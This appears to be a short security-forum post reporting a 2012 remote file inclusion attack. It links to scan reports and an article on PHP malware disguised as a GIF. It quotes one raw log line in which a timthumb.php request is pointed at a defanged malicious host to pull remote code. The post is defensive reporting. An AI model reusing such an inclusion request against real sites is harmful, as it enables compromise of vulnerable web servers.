See: https://www.virustotal.com/url/801e01b1e0757edcb07201e4fd4b35fe927a23c7b75a320a22b8da015ec19cd0/analysis/1328823773/
and
http://vscan.urlvoid.com/analysis/f42e63123f17e6692ff5bb67ed793aad/amFtaWxhLXBocA==/
RFI malware listed at critical security as -196.36.89.12,09/Feb/2012:03:20:03 +0100,hxxp://picasa.com.dk-cell.com.mx/jamila.php,/misc//wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=hxxp://picasa.com.dk-cell.com.mx/jamila.php HTTP/1.1
See: -http://jsunpack.jeek.org/?report=6bd6e499bead9eab1736f5529a27c2fb0ddca085 (Go to last mentioned link only if security savvy, with ample script protection and in a VM),
Random vulnerability. For a description see: http://www.metod.si/random-vulnerability-disected/ link from SimpleFolia, article author razno - it has obfuscated PHP code behind the binairy data in a file that initially tries to disguise as a GIF image – GIF89a,
polonus